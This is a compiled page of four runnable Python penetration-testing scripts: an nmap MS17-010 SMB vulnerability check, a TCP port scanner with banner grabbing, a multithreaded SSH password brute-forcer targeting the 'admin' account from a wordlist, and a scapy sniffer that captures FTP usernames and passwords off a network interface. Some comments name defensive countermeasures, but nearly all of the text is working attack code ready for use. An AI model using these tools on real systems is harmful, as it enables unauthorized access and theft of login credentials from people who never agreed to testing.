
Python 常用渗透测试脚本



SMB扫描渗透测试

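#!/usr/bin/python
# coding=utf-8
"""Check a target for the MS17-010 SMB flaw with nmap's NSE detection script."""
# The listing had the coding line, the shebang and `import subprocess` fused
# into one comment line, which left `subprocess` unimported. The shebang is
# placed first so the kernel honours it.
import subprocess
import optparse


def smb_scan(ip):
    """Run nmap's ``smb-vuln-ms17-010`` script against *ip*.

    The script only reports whether the SMB service looks vulnerable to
    MS17-010; hosts it flags need the MS17-010 update and should have SMBv1
    disabled.

    Args:
        ip: target specification, passed to nmap unchanged.

    Returns:
        nmap's process exit status as returned by ``subprocess.call``.
    """
    # Argument list plus shell=False: the target is a single argv element and
    # is never parsed by a shell, so shell metacharacters in it have no effect.
    command = ['nmap', '--script=smb-vuln-ms17-010', ip]
    return subprocess.call(command, shell=False)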

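def main():
    """Parse ``-P <target>`` from the command line and run the SMB check.

    Exits through ``parser.error`` (usage message, status 2) when the target
    is missing or looks like an option.
    """
    parser = optparse.OptionParser('usage: %prog -P <target>')
    parser.add_option('-P', dest='arg', type='string',
                      help='specify target ip segment/eg:(192.168.1.)')
    (options, args) = parser.parse_args()
    ip = options.arg
    if not ip:
        # Without -P the value is None and subprocess would fail on it.
        parser.error('-P is required')
    if ip.startswith('-'):
        # The value becomes an nmap argv element; a leading dash would be
        # read by nmap as one of its own options rather than as a target.
        parser.error('target must not start with "-"')
    smb_scan(ip)


if __name__ == '__main__':
    main()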

主机端口服务判断渗透测试

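#!/usr/bin/python
# coding=utf-8
"""TCP connect check with a best-effort banner read."""
# The listing had the coding line, the shebang and `import optparse` fused
# into one comment line, which left `optparse` unimported.
import optparse
from socket import *


def sockerconn(host, port):
    """Report whether TCP *port* on *host* accepts a connection.

    Prints ``<port> tcp open`` when the connection succeeds, followed by up to
    100 bytes of whatever the service sends back, or ``<port> tcp close`` when
    the connection fails.

    Args:
        host: host name or address to connect to.
        port: TCP port number as an int.
    """
    client = socket(AF_INET, SOCK_STREAM)
    try:
        try:
            # The listing called recv() here, which raises before any
            # connection exists, so every port was reported closed.
            client.connect((host, port))
        except (error, OverflowError):
            # `error` is socket.error (refused, timed out, unresolvable);
            # OverflowError covers a port number outside 0-65535.
            print(str(port) + " tcp close")
            return
        print(str(port) + " tcp open")
        try:
            client.send(b'hellopython\r\n')
            results = client.recv(100)
        except error:
            # A service that stays silent or resets is still an open port.
            return
        print(str(results))
    finally:
        # Release the descriptor on every path, including failures.
        client.close()


def portscan(host, ports):
    """Check each entry of *ports* on *host*, one connection at a time.

    Args:
        host: host name or address to check.
        ports: iterable of port numbers given as strings.
    """
    # Module-wide socket default: one second for connect and for the banner.
    setdefaulttimeout(1)
    print("scan results for " + host)
    for port in ports:
        print('*' * 40)
        print("scanning port: " + port)
        try:
            number = int(port)
        except ValueError:
            # An empty or non-numeric entry skips that port only.
            print("invalid port: " + port)
            continue
        sockerconn(host, number)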

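def main():
    """Parse ``-H`` and ``-p`` from the command line and run the port check.

    Exits through ``parser.error`` (usage message, status 2) when either
    option is missing.
    """
    parser = optparse.OptionParser('usage: %prog -H <host> -p <port>[,<port>...]')
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-p', dest='port', type='string', help='specify target port(s) separated by comma')
    (options, args) = parser.parse_args()
    if options.host is None or options.port is None:
        # Previously a missing option reached portscan as None / 'None' and
        # failed there with a TypeError or ValueError.
        parser.error('both -H and -p are required')
    portscan(options.host, options.port.split(','))


if __name__ == '__main__':
    main()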

远程ssh访问渗透测试

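#!/usr/bin/python
# coding=utf-8
"""Try the passwords from a wordlist against one SSH account."""
# The listing had the coding line, the shebang and `import optparse` fused
# into one comment line, which left `optparse` unimported.
import optparse
import paramiko
from threading import Thread


def connect(host, user, pwd):
    """Attempt one SSH password login and print the credentials if it works.

    Args:
        host: SSH server to connect to.
        user: account name to authenticate as.
        pwd: candidate password.
    """
    try:
        ssh = paramiko.SSHClient()
        # AutoAddPolicy accepts any host key the server presents, so the
        # server's identity is not verified.
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(hostname=host, username=user, password=pwd, timeout=5)
        ssh.close()
        # The accepted password is written to stdout in clear text.
        print('brute success!' + ',host IP: ' + host + 'username: ' + user)
        print('password:' + pwd)
    except Exception:
        # Best-effort by design: a rejected login, a timeout and a network
        # error are indistinguishable here and all pass silently.
        pass


def ssh_brute(host, passwd_dict):
    """Start one login attempt per line of the file *passwd_dict*.

    On the server this shows up as many near-simultaneous failed password
    authentications for a single account from a single source address in the
    sshd authentication log; key-only authentication, a low MaxAuthTries and
    per-source rate limiting are the usual countermeasures.

    Args:
        host: SSH server to test.
        passwd_dict: path to a text file with one candidate password per line.
    """
    print('brute is running: ' + host)
    user = 'admin'  # the account name is fixed
    paramiko.util.log_to_file("sshconn.log@" + host)
    # The file is closed once every line has been read; the listing left the
    # handle open.
    with open(passwd_dict) as passwords:
        for password in passwords:
            # The listing's strip argument was garbled by escaping; only the
            # trailing newline is meant to be removed.
            pwd = password.strip('\n')
            # One thread per line, started immediately and never joined.
            t = Thread(target=connect, args=(host, user, pwd))
            t.start()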

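def main():
    """Parse ``-H`` and ``-p`` from the command line and start the run.

    Exits through ``parser.error`` (usage message, status 2) when either
    option is missing.
    """
    # The listing's usage text also named -u, but only -H and -p are
    # registered below.
    parser = optparse.OptionParser('usage: %prog -H <host> -p <password file>')
    parser.add_option('-H', dest='host', type='string', help='specify host to brute')
    parser.add_option('-p', dest='passwd_dict', type='string', help='specify passwords dictionary to brute')
    (options, args) = parser.parse_args()
    host = options.host
    passwd_dict = options.passwd_dict
    if host is None or passwd_dict is None:
        # Previously a missing option reached ssh_brute as None and failed
        # there with a TypeError.
        parser.error('both -H and -p are required')
    ssh_brute(host, passwd_dict)


if __name__ == '__main__':
    main()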

网络协议渗透测试

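#!/usr/bin/python
# coding=utf-8
"""Print FTP USER/PASS commands seen on an interface.

FTP carries both commands in clear text on its control connection, so any
host that can capture the traffic can read them; FTPS or SFTP removes that
exposure.
"""
import optparse
import re
import sys

from scapy.all import *


def ftpsniff(pkt):
    """Print the FTP user name or password carried by *pkt*, if any.

    Args:
        pkt: a captured scapy packet.
    """
    ip_layer = pkt.getlayer(IP)
    # The listing printed the whole IP layer instead of its destination
    # address. Packets without an IPv4 layer have no such address to show.
    dest = ip_layer.dst if ip_layer is not None else '?'
    raw = pkt.sprintf('%Raw.load%')
    user = re.findall('(?i)USER (.*)', raw)
    pswd = re.findall('(?i)PASS (.*)', raw)
    if user:
        print('FTP Login to ' + str(dest))
        print('Username: ' + str(user[0]))
    elif pswd:
        print('Password: ' + str(pswd[0]))


def ftpsniffmain():
    """Parse ``-i <interface>`` and capture on it until interrupted."""
    parser = optparse.OptionParser('usage: %prog -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()
    if options.interface is None:
        print(parser.usage)
        sys.exit(0)
    conf.iface = options.interface
    try:
        print('FTP sniffer is running')
        # store=0: packets go to the callback only and are not accumulated in
        # memory for the lifetime of the capture.
        sniff(filter='tcp port 21', prn=ftpsniff, store=0)
    except KeyboardInterrupt:
        sys.exit(0)


if __name__ == '__main__':
    ftpsniffmain()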
